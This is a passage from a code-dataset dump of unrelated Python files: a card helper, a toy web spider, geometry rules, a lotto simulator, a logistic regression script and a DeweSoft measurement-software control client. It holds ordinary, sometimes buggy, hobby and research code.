'A':\n val = 1\n elif tmp == 'J' or tmp == 'Q' or tmp == 'K':\n val = 10\n else:\n assert False ('card type is wrond')\n \n return val\n","sub_path":"util/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"167517023","text":"from TinyScrapy.tinyScrapy import Request\n\n\nclass BaiduSpider(object):\n def start_requests(self):\n start_urls = [\n 'https://blog.csdn.net/weixin_37947156/article/details/74435304',\n 'https://www.baidu.com/',\n 'https://blog.csdn.net/weixin_37947156/article/list/3',\n ]\n\n for url in start_urls:\n yield Request(url=url, callback=self.parse)\n\n def parse(self, response):\n print(response.request.url, '!!!!')\n yield Request(url='https://pagespeed.v2ex.com/go/cv?p=1', callback=self.parse2)\n yield Request(url='https://www.bilibili.com/', callback=self.parse2)\n\n def parse2(self, response):\n print(response.request.url, '@@@@@@@@@@')\n","sub_path":"TinyScrapy/spider/baiduSpider.py","file_name":"baiduSpider.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"345569191","text":"\"\"\"Point Structure.\"\"\"\nfrom rules.drawable import *\nlineADT = {\n parent:tuple(),\n \"new\":{\n tuple():{\n args:tuple(),\n trgt:Line.default\n },\n (str,):{\n args:(\"parallelAxis\",),\n trgt:Line.default\n },\n (Point,Point,):{\n args:(\"point1\",\"point2\"),\n trgt:Line.fromPoints,\n },\n (float,float,Point,):{\n args:(\"angle\",\"length\",\"point\",),\n trgt:Line.fromMetrics,\n },\n retVal:Point\n },\n \"copy\":{\n tuple():{\n args:tuple(),\n trgt:Line.fromLine\n },\n retVal:Line\n },\n \"angle\":{\n tuple():{\n args:tuple(),\n trgt:Line.angle\n },\n retVal:float\n },\n \"length\":{\n tuple():{\n args:tuple(),\n trgt:Line.length\n },\n retVal:float\n },\n \"distance\":{\n (Line,):{\n args:(\"line\",),\n trgt:Line.distanceFrom\n },\n (Point,):{\n args:(\"point\",),\n trgt:Line.distanceFrom\n },\n retVal:float\n },\n \"bisector\":{\n tuple():{\n args:tuple(),\n trgt:Line.bisector\n },\n retVal:Point\n },\n \"sector\":{\n (float, float,):{\n args:(\"m\", \"n\",),\n trgt:Line.sector\n },\n retVal:Point\n },\n \"intersect\":{\n (Line,):{\n args:(\"line\",),\n trgt:Line.intersectionWith\n },\n retVal:Point\n },\n \"parallel_line\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.parallelLine\n },\n (float,):{\n args:(\"distance\",),\n trgt:Line.parallelLine\n },\n retVal:Point\n },\n \"projection\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.projectionOf\n },\n retVal:Point\n },\n \"perpendicular\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.perpendicularFrom\n },\n (float,):{\n args:(\"ratio\",),\n trgt:Line.perpendicularAt\n },\n retVal:Line\n },\n \"perpendicular_bisector\":{\n tuple():{\n args:tuple(),\n trgt:Line.perpendicularBisector\n },\n retVal:Line\n },\n \"triangle\":{\n (Point,):{\n args:(\"point\",),\n trgt:Line.triangleTo\n },\n retVal:Triangle\n },\n \"circle\":{\n tuple():{\n args:tuple(),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"tangent_circle\":{\n (Point,):{\n args:(\"tangentCentre\",),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"chord_circle\":{\n (Point,):{\n args:(\"chordCentre\",),\n trgt:Line.circleAround\n },\n retVal:Circle\n },\n \"square\":{\n tuple():{\n args:tuple(),\n trgt:Line.square\n },\n retVal:int\n },\n \"rectangle\":{\n (float,):{\n args:(\"sideLength\",),\n trgt:Line.rectangle\n },\n retVal:int\n }\n}","sub_path":"rules/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"123485501","text":"import random\n \n\n\ndef lottoarvonta():\n numerot = list(range(1,41))\n lottorivi = random.sample(numerot, 7)\n for i in lottorivi:\n numerot.remove(i)\n lisanumerot = random.sample(numerot, 3) \n return lottorivi,lisanumerot\n\ndef pelaa():\n omarivi = lottoarvonta()\n lottorivi = omarivi[0]\n lisanumerot = omarivi[1]\n return lottorivi, lisanumerot\n\ndef tarkista(arvonta, rivi):\n oikeat = arvonta\n omarivi = rivi\n normirivitulos = []\n lisarivi=[]\n for i in omarivi[0]:\n if i in oikeat[0]:\n normirivitulos.append(i)\n for i in omarivi[1]:\n if i in oikeat[1]:\n lisarivi.append(i) \n print(len(normirivitulos) , \"oikein\", normirivitulos, \"ja\",len(lisarivi), \"lisänumeroa\" , lisarivi)\n #print(oikeat, omarivi)\n\n\narvonta = lottoarvonta()\nprint('Oikea rivi:', end = ' ')\nprint(*arvonta[0], sep = ', ') # näinkin voi tehdä!\nprint('Lisänumerot:', end = ' ')\nprint(*arvonta[1], sep = ', ') \nrivi = pelaa() \nprint('Rivi:', end=' ')\nprint(*rivi[0], sep = ', ')\nprint('Lisänumerot:', end = ' ')\nprint(*rivi[1], sep = ', ') \ntarkista(arvonta, rivi) ","sub_path":"Python/Pythontehtavat/03 Tietorakenteita ja luokkia/lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"563915273","text":"# This program will execute the optimal comparison, scikit-learn's \n# implementation of logistic regression, on our same datasets.\n# This will give us an idea about what kind of accuracy might be possible.\n\nfrom sklearn.linear_model import LogisticRegression as lr\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score\nfrom csv import reader\nfrom typing import List, Tuple\nimport numpy as np\n\n## Read in and store the data\nheader = None\ndef get_data(filename:str) -> Tuple[List,List[int]]:\n global header\n filepath = \"decision-tree/data/\" + filename + \".csv\"\n with open(filepath, 'r') as read_obj:\n # pass the file object to reader() to get a reader object, and\n # pass the reader object to list() to get a list of lists.\n df = list(reader(read_obj))\n # save and remove the header\n header = df[0]\n del df[0]\n\n # define X (training samples) and Y (labels)\n X = df\n Y = []\n for line in X:\n # add the target to Y\n Y.append(line[len(line)-1])\n # remove the target from X_train\n del line[len(line)-1]\n # remove the first var as well (the useless index)\n del line[0]\n # reflect the var removal in the header\n del header[0]\n return np.array(X).astype(np.float64), np.array(Y).astype(np.float64)\n\n# main ------\nX_train, Y_train = get_data(\"ks_train_full_cat\")\nX_val, Y_val = get_data(\"ks_validate_full_cat\")\nX_test, Y_test = get_data(\"ks_test_full_cat\")\n\n#X_train, Y_train = get_data(\"ks_train_full\")\n#X_val, Y_val = get_data(\"ks_validate_full\")\n#X_test, Y_test = get_data(\"ks_test_full\")\n\n# define the classifier w/ our training data\n# do a grid search to find best model\nclf = lr(random_state=5, C= .001)\n#param_grid = {'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000] }\n#search = GridSearchCV(clf, param_grid, cv=5)\nclf = clf.fit(X_train, Y_train)\n\n#best = clf.best_estimator_\nbest = clf\n\nprint(\"Model Parameters\")\nprint(best.get_params())\n\n# use the model for probabilistic prediction\nY_pred_train = best.predict(X_train)\nY_pred_val = best.predict(X_val)\n\n# Returns number of accurate predictions\naccuracy_train = accuracy_score(Y_train, Y_pred_train)\naccuracy_val = accuracy_score(Y_val, Y_pred_val)\n\nprint(\"Training Accuracy: \" + str(accuracy_train))\nprint(\"Validation Accuracy: \" + str(accuracy_val))\n\n# # create a new dataset of both the training and validation data\nX_tv = np.concatenate( (X_train, X_val))\nY_tv = np.concatenate((Y_train, Y_val))\n\n# define the classifier\nclf = clf.fit(X_tv, Y_tv)\n\n# probabilistic prediction\nY_test = clf.predict(X_tv)\n\naccuracy_test = accuracy_score(Y_tv, Y_test)\n\nprint(\"Testing Accuracy: \" + str(accuracy_test))\n","sub_path":"logistic-regression/optimal-lr.py","file_name":"optimal-lr.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41976556","text":"\"\"\"\nCopyright (c) 2018, Austrian Institute of Technology\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this\nlist of conditions and the following disclaimer in the documentation and/or\nother materials provided with the distribution.\n\nNeither the names of the Austrian Institute of Technology nor the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\nANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\"\"\"DeweNetControllerClient module for remote control purposes of the DeweSoft\n\nThis module implements the remote control for the communication with the\nDeweSoft measurement software. Therefore the class DeweNetControllerClient is\nused. This module also implements the used exceptions.\n\n\nCommand reference (DEWESoft NET protocol version 4) from DeweSoft Net Interface\nManual\n\nEach command has to have New line suffix (0x13 + 0x10). Commands in brackets\ncan only be sent in control mode.\n\n+-------------------+----------------------------------------------------------+\n| Command | Description |\n+===================+==========================================================+\n| GETVERSION | returns DEWESoft version |\n+-------------------+----------------------------------------------------------+\n| GETINTFVERSION | returns DEWESoft NET protocol version |\n+-------------------+----------------------------------------------------------+\n| GETDATETIME | returns current time on measurement unit |\n+-------------------+----------------------------------------------------------+\n| GETMODE | returns current operation mode (control or view) |\n+-------------------+----------------------------------------------------------+\n| SETMODE mode | sets operation mode; |\n| +-------------------+--------------------------------------+\n| | mode parameter: | 0 - view mode |\n| | +--------------------------------------+\n| | | 1 - control mode |\n+-------------------+-----------------------+----------------------------------+\n| SETMASTERMODE mode| sets clock mode of the devices, used for synchronize |\n| | several devices at the same time |\n| +-------------------+--------------------------------------+\n| | mode parameter: | 0 - standalone (if only one system is|\n| | | used |\n| | | 1 - clock master system (clock is |\n| | | output from this system to the |\n| | | slaves - only one!) |\n| | | 2 - clock slave mode (clock will be |\n| | | received from a master system) |\n+-------------------+-------------------+--------------------------------------+\n| SETSAMPLERATE | sets sampling rate |\n| samplerate +---------------------+------------------------------------+\n| | samplerate parameter| sample rate in Hz |\n+-------------------+---------------------+------------------------------------+\n| GETSAMPLERATE | reads current sample rate |\n+-------------------+----------------------------------------------------------+\n| LISTUSEDCHS | lists all used channels |\n+-------------------+----------------------------------------------------------+\n| PREPARETRANSFER | sends a list of channels for live capture. Channels can |\n| | only be selected from used channel syntax: |\n| | |\n| | :: |\n| | |\n| | /stx preparetransfer |\n| | ch 0 |\n| | . |\n| | . |\n| | ch x |\n| | /etx |\n| | |\n+-------------------+----------------------------------------------------------+\n| STARTTRANSFER | requests DEWESoft to connect to port 'portno' and feed |\n| portno filename | data to client |\n| +---------------------+------------------------------------+\n| | portno parameter: | TCP port number on client computer |\n+-------------------+---------------------+------------------------------------+\n| STOPTRANSFER | stops transfer |\n+-------------------+----------------------------------------------------------+\n| STARTTRIGTRANSFER | requests DEWESoft to connect to port 'portno' and feed |\n| portno | last trigger data to client |\n| +---------------------+------------------------------------+\n| | portno parameter: | TCP port number on client computer |\n+-------------------+---------------------+------------------------------------+\n| STARTACQ | start acquisition - measure (more suitable name would be |\n| | STARTMEASURE) |\n+-------------------+----------------------------------------------------------+\n| STOP |stop acquisition / leave setup mode and go to start screen|\n+-------------------+----------------------------------------------------------+\n| STARTSTORE | starts storing, also starts acquisition if not yet |\n| filename | started |\n+-------------------+----------------------------------------------------------+\n| SETSTORING status | sets storing on or off on measurement unit |\n| +---------------------+------------------------------------+\n| | status parameter: | ON - remote storing on |\n| + +------------------------------------+\n| | | OFF - remote storing off |\n+-------------------+---------------------+------------------------------------+\n| ENTERSETUP | enter setup mode / start acquisiton in setup mode |\n+-------------------+----------------------------------------------------------+\n| ISACQUIRING | returns 'Yes' if acquisition is in progress (measure or |\n| | setup), otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| ISSETUPMODE | returns 'Yes' if in setup mode, otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| ISSTORING |returns 'Yes' if in storing is in progress, otherwise 'No'|\n+-------------------+----------------------------------------------------------+\n| ISMEASURING | returns 'Yes' if acquisition is in progress (measure), |\n| | otherwise 'No' |\n+-------------------+----------------------------------------------------------+\n| GETSTATUS |returns DEWESoft status (measure/analyse mode, clock mode)|\n+-------------------+----------------------------------------------------------+\n| SETFULLSCREEN | sets or clears full screen mode of DEWESoft |\n| status +---------------------+------------------------------------+\n| | status parameter: | 1 - full screen on |\n| + +------------------------------------+\n| | | 0 - full screen off |\n+-------------------+---------------------+------------------------------------+\n| SETUP CONNECT | sets DEWESoft to full screen setup mode. |\n| | Suitable for VNC remote setup of DEWESoft |\n+-------------------+----------------------------------------------------------+\n| SETUP DISCONNECT | cancels setup full screen mode |\n+-------------------+----------------------------------------------------------+\n| DISPLAY START | sets DEWESoft to full screen display setup mode. |\n| | Suitable for VNC remote setup of DEWESoft displays |\n+-------------------+----------------------------------------------------------+\n| DISPLAY STOP | cancels display setup mode |\n+-------------------+----------------------------------------------------------+\n| LOADSETUP filename| loads a setup; filename parameter: setup file stored on |\n| | measurement unit |\n+-------------------+----------------------------------------------------------+\n| SAVESETUP filename| saves a setup; filename parameter: setup file to be |\n| | stored on measurement unit |\n+-------------------+----------------------------------------------------------+\n| NEWSETUP | clears current DEWESoft setup |\n+-------------------+----------------------------------------------------------+\n| SETSCREENSIZE | sets DEWESoft window size in pixels |\n| screensize +-----------------------+----------------------------------+\n| | screensize parameter: | XsizexYSize - sets window size to|\n| | | Xsize x Ysize (i.e. 640x480) |\n| +-----------------------+----------------------------------+\n| | | max - maximizes window size |\n+-------------------+-----------------------+----------------------------------+\n\nTODO implement automatic start of DeweSoft instance\n If the DeweSoft instance isn't already started and no process is running,\n than automatically start the DeweSoft using an absolute start path.\n\"\"\"\n\n\nfrom io import StringIO\nimport logging\nimport socket\n\nfrom datetime import datetime\n\nfrom .dewenet_data import DeweChannelInfo\n\n\ndef dt_now():\n \"\"\"Helper method for getting the timestamp\n\n Will be necessary for testing\n\n Returns:\n datetime: current time\n \"\"\"\n return datetime.now()\n\n\nclass DeweNetClientException(Exception):\n \"\"\"Base exception raised for errors in the DeweNetClient module\"\"\"\n\n def __init__(self, *args, **kwargs):\n Exception.__init__(self, *args, **kwargs)\n\n\nclass DeweNetControllerClient(object):\n \"\"\"Client for Communication with DeweSoft.\n\n The DeweNetControllerClient class implements the necessary functionality\n for controlling the DeweSoft. Thereby the NET-Plugin for DeweSoft must be\n registered and the Slave Mode of the DeweSoft program must be activated\n (Settings-Hardware Setup-NET-Computer role in NETwork -> Slave measurement\n unit)\n\n The class uses a TCP-client that connects to an open port of the DeweSoft\n (usually 8999)\n\n Example:\n\n ::\n\n deweController = DeweNetControllerClient()\n deweController.connect_to_Dewe('127.0.0.1',8999)\n\n print \"GetSampleRate\",deweController.dewe_get_samplerate()\n print \"ISAquiring\",deweController.dewe_is_acquiring()\n print \"GetMode\",deweController.dewe_get_mode()\n deweController.dewe_load_setupfile(\n \"C:\\\\DATA\\\\Cotevos\\\\EVTestStand\\\\EvTestStand.d7s\")\n deweController.dewe_list_used_channels()\n deweController.dewe_start_acquisition()\n time.sleep(10)\n deweController.dewe_stop()\n deweController.close_Dewe_Connection()\n\n\n Attributes:\n EXP_INTF_VERSION (int): Definition of implemented protocol\n version. If other revisions are used, please check the\n communication flow for changes.\n\n _socket (socket): The TCP client socket for communication with the TCP\n Server of the DeweSoft Slave device\n\n available_channels (dict): After loading a setup file of the DeweSoft\n (function dewe_load_setupfile() ) the channels can be read from\n DeweSoft by using dewe_list_used_channels().\n This dictionary contains a list of 'DeweChannel' classes with the\n name of the channel as key. Therefore different settings of the\n channel are stored (see DeweChannel documentation)\n \"\"\"\n\n EXP_INTF_VERSION = 31\n \"\"\"Interface version that is used during development.\n\n The client is tested against this protocol version.\n \"\"\"\n\n def __init__(self, client_socket=None, logger=None):\n \"\"\"Default constructor\n\n Args:\n client_socket (socket.socket, optional): Socket for connecting to\n DeweSoft (usually a TCP socket)\n logger (logging.logger, optional): Sets the logger\n \"\"\"\n self._logger = logger or logging.getLogger(__name__)\n self._socket = client_socket or socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n self.available_channels = dict()\n self._logger.debug(\"Initialize DeweNetController Client\")\n\n def connect_to_dewe(self, dewe_ip='127.0.0.1', dewe_port=8999):\n \"\"\"Connect to the DeweSoft Net interface\n\n The function must be called after creation of the\n DeweNetControllerClient. It will connect to a running instance off\n DeweSoft on the Host computer and reads the interface version and the\n version of the DeweSoft.\n\n Args:\n dewe_ip (str, optional): IP address of the computer with running\n DeweSoft\n dewe_port (int, optional): Open port of the DeweSoft client,\n usually 8999\n\n Returns:\n list: dewe_interface_version, dewe_version\n dewe_interface_version (int): version of the Dewe-Net interface\n dewe_version (str): version of the connected DeweSoft instance\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n self._logger.info(\"Connect to DeweSoft at {}: {}\".format(dewe_ip,\n dewe_port))\n dewe_ip = dewe_ip.encode(\"ascii\")\n self._socket.connect((dewe_ip, dewe_port))\n\n # get first response after successful connection\n con_respmsg = self._dewe_read_response()[0]\n self._logger.debug(\"Response: '{}'\".format(con_respmsg))\n\n if con_respmsg.startswith(\"+CONNECTED\"):\n self._logger.info(\"Connection successfully opened.\")\n else:\n raise DeweNetClientException(\n \"connect_to_Dewe\",\n \"Unkown response received from DeweSoft : \" + con_respmsg)\n\n dewe_interface_version = self._dewe_read_interface_version()\n dewe_version = self._dewe_read_version()\n self._logger.info(\"Interface Version: {} Version: {}\".format(\n dewe_interface_version, dewe_version))\n return dewe_interface_version, dewe_version\n\n def _dewe_read_interface_version(self):\n \"\"\"Read the interface version of the connected DeweSoft.\n\n This helper function reads the interface version of the connected\n DeweSoft and stores the value in the attribute\n '_dewe_interface_version'.\n\n Returns:\n int: interface version read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETINTFVERSION\")[0]\n\n if response.startswith(\"+OK\"):\n intf_version = int(response.replace(\"+OK \", \"\"))\n\n if intf_version != DeweNetControllerClient.EXP_INTF_VERSION:\n self._logger.warn(\n \"Used Interface with Version '{0}'\"\n \" doesn't match expected one '{1}'.\".format(\n intf_version,\n DeweNetControllerClient.EXP_INTF_VERSION))\n else:\n self._logger.debug(\n \"Used Interface with Version '{0}' matches expected one \"\n \"'{1}'.\".format(\n intf_version,\n DeweNetControllerClient.EXP_INTF_VERSION))\n\n return intf_version\n\n else:\n raise DeweNetClientException(\n \"dewe_read_interface_version\",\n \"Error reading interface version: '{}'\".format(response))\n\n def _dewe_read_version(self):\n \"\"\"Read the version of the connected DeweSoft\n\n This helper function reads the version of the connected DeweSoft and\n stores the value in the attribute '_dewe_version'.\n\n Returns:\n str: Version string read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETVERSION\")[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_read_version\",\n \"Error reading version: '{}'\".format(response))\n\n return response.replace(\"+OK \", \"\")\n\n def disconnect_from_dewe(self):\n \"\"\"Closes the connection to the DeweSoft\n\n \"\"\"\n self._logger.info(\"Close DeweNetControllerClient\")\n self._socket.close()\n\n def dewe_get_datetime(self):\n \"\"\"Read the current time on the measurement device\n\n Returns:\n datetime: Current datetime read from DeweSoft\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n response = self._dewe_request_control_message(\"GETDATETIME\")[0]\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"_dewe_get_dateTime: Can't \"\n \"convert received message to datetime\", response)\n\n response = response.replace(\"+OK\", \"\").strip()\n return datetime.strptime(response, \"%d.%m.%Y %H:%M:%S\")\n\n def dewe_set_mode(self, mode=False):\n \"\"\"Sets the operation mode of the DeweSoft\n\n Args:\n mode (bool,optional): Mode of the DeweSoft\n False - Set to View Mode\n True - Set to Control Mode\n\n Returns:\n bool: True - DeweSoft is in control mode\n False - DeweSoft is in view mode\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n comm_mode = 1 if mode else 0 # generate argument for request\n\n response = self._dewe_request_control_message(\n \"SETMODE \" + str(comm_mode))[0]\n\n if not response.startswith(\"+OK\"):\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n return mode\n\n def dewe_get_mode(self):\n \"\"\"Read the current mode of the DeweSoft.\n\n Returns:\n bool: True - DeweSoft is in control mode\n False - DeweSoft is in view mode\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETMODE\")[0]\n\n if response.startswith(\"+OK\"):\n response = response.split(\" \")\n return int(response[2]) == 1\n\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_start_acquisition(self):\n \"\"\"Start the acquisition (measurement) on the DeweSoft\n\n Returns:\n time: current time of measurement start\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\"STARTACQ\")[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_start_store(self, filename):\n \"\"\"Start the storing function and the acquisition (if not already\n running) on the DeweSoft\n\n Args:\n filename (str): Filename and path of the storage file on local\n DeweSoft\n\n Returns:\n time: current time of measurement start\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\n \"STARTSTORE \" + filename)[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error starting storage on DeweSoft: '{}'\".format(response))\n\n def dewe_set_storing(self, storing=True):\n \"\"\"Start storing mode of the DeweSoft\n\n Sets the Mode for the control option of the DEWE connection\n\n Args:\n storing (bool): False - Not storing\n True - Store\n\n Returns:\n bool: mode of storing\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n comm_storing = \"ON\" if storing else \"OFF\"\n\n response = self._dewe_request_control_message(\n \"SETSTORING \" + comm_storing)[0]\n\n if response.startswith(\"+OK\"):\n return storing\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_stop(self):\n \"\"\"Stop the acquisition (measurement) and/or storing on the DeweSoft\n\n Returns:\n time: current time of measurement start\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\"STOP\")[0]\n if response.startswith(\"+OK\"):\n return dt_now()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_is_acquiring(self):\n \"\"\"Get actual state of acquisition\n\n Returns:\n bool: True, if DeweSoft is in acquisition mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISACQUIRING\")\n\n def dewe_is_setup_mode(self):\n \"\"\"Get actual state of setup mode\n\n Returns:\n bool: True, if DeweSoft is in setup mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISSETUPMODE\")\n\n def dewe_is_storing(self):\n \"\"\"Get actual state of storing\n\n Returns:\n bool: True, if DeweSoft is in storing mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISSTORING\")\n\n def dewe_is_measuring(self):\n \"\"\"Get actual state of acquisition\n\n Returns:\n bool: True, if DeweSoft is in acquisition mode, otherwise False\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n return self._dewe_get_bool_message(\"ISMEASURING\")\n\n def dewe_get_status(self):\n \"\"\"Get actual status of DeweSOft\n\n Returns:\n str: State information of DeweSoft (e.g. Response Mode: Measure,\n Acquiring; Clock mode: Standalone)\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETSTATUS\")[0]\n if response.startswith(\"+OK\"):\n return response.replace(\"+OK\", \"\").strip()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n\n def dewe_load_setupfile(self, filename):\n \"\"\"Loads a setup file stored on the DeweSoft computer\n\n Args:\n filename (str): Full Filename with path of the setup file to be\n loaded\n Returns:\n str: Response from DeweSoft\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if not self.dewe_get_mode():\n self.dewe_set_mode(True) # Set to control mode\n\n response = self._dewe_request_control_message(\n \"LOADSETUP \" + filename)[0]\n if response.startswith(\"+OK\"):\n return response.replace(\"+OK\", \"\").strip()\n else:\n raise DeweNetClientException(\n \"dewe_set_mode\",\n \"Error setting mode of DeweSoft: '{}'\".format(response))\n def dewe_set_samplerate(self, samplefrequency = None):\n \"\"\"Writes the sample rate of the DeweS\n oft\n\n Returns:\n int: Sample Rate of DeweSoft in Hz\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n if samplefrequency:\n response = self._dewe_request_control_message(\n \"SETSAMPLERATE \" + str(samplefrequency))[0]\n #response = self._dewe_request_control_message(\"GETSAMPLERATE\")[0]\n if response.startswith(\"+OK\"):\n self._logger.info(response)\n response = response.replace(\"+OK\", \"\").strip()\n self._logger.info(response)\n response = response[response.find('<') + 1:response.find('>')]\n self._logger.info(response)\n return int(response)\n\n else:\n self._logger.info(response)\n raise DeweNetClientException(\n \"dewe_set_samplerate\",\n \"Can't set samplerate from DeweSoft: '{}'\".format(response))\n else:\n return None\n\n\n\n def dewe_get_samplerate(self):\n \"\"\"Read the actual sample rate of the DeweSoft\n\n Returns:\n int: Sample Rate of DeweSoft in Hz\n\n Raises:\n DeweNetClientException: If an error is occured during communication.\n \"\"\"\n response = self._dewe_request_control_message(\"GETSAMPLERATE\")[0]\n if response.startswith(\"+OK\"):\n return int(response.replace(\"+OK\", \"\").strip())\n else:\n raise DeweNetClientException(\n \"dewe_get_samplerate\",\n \"Can't read samplerate from DeweSoft: '{}'\".format(response))\n\n def dewe_list_used_channels(self):\n \"\"\"Read all available channels from DeweSoft with its parameters\n\n This function reads all available channels from the DeweSoft and stores\n it in the available_channels list. Then it is possible to get these\n values for further work. (using client.available_channels.keys())\n \"\"\"\n response = self._dewe_request_control_message(\"LISTUSEDCHS\")\n\n for line in response:\n element = line.split(\"\\t\")\n\n if len(element) > 22:\n channel = DeweChannelInfo(channel_number=element[2],\n name=element[3],\n unit=element[5],\n samplerate_divider=element[6],\n measurement_type=element[8],\n sample_data_type=element[9],\n buffer_size=element[10],\n custom_scale=element[11],\n custom_offset=element[12],\n scale_raw_data=element[13],\n offset_raw_data=element[14],\n description=element[15],\n settings=element[16] + \" \" + element[19],\n range_min=element[17],\n range_max=element[18],\n value_min=element[21],\n value_max=element[22],\n value_act=(element[23]\n if len(element) > 23 else 0.0))\n self.available_channels[channel.name] = channel\n elif len(element) > 18:\n\n channel = DeweChannelInfo(channel_number=element[2],\n name=element[3],\n unit=element[5],\n samplerate_divider=element[6],\n measurement_type=element[8],\n sample_data_type=element[9],\n buffer_size=element[10],\n custom_scale=element[11],\n custom_offset=element[12],\n scale_raw_data=element[13],\n offset_raw_data=element[14],\n description=element[15],\n settings=element[16] + \" \" + element[19],\n range_min=element[17],\n range_max=element[18],\n value_min=0.0,\n value_max=0.0,\n value_act=0.0)\n self.available_channels[channel.name] = channel\n else:\n raise DeweNetClientException(\n \"Error reading channel\",\n \"Channel {} hasn't enough elements\".format(\n element[3] if len(element) > 3 else \"unknown\"))\n\n def dewe_read_last_values(self):\n \"\"\"Read last values from DeweSoft\n\n This method uses the client interface to read current values from\n DeweSoft.\n This method can be used as a fallback solution to read values cyclic.\n\n Returns:\n list: List of tuples containing all DeweSoft channels\n tuple: (ch_number,ch_name,value)\n ch_number (int): number of DeweSoft channel\n ch_name (str): Name of the channel\n value (float): Last value of the channel\n \"\"\"\n response = 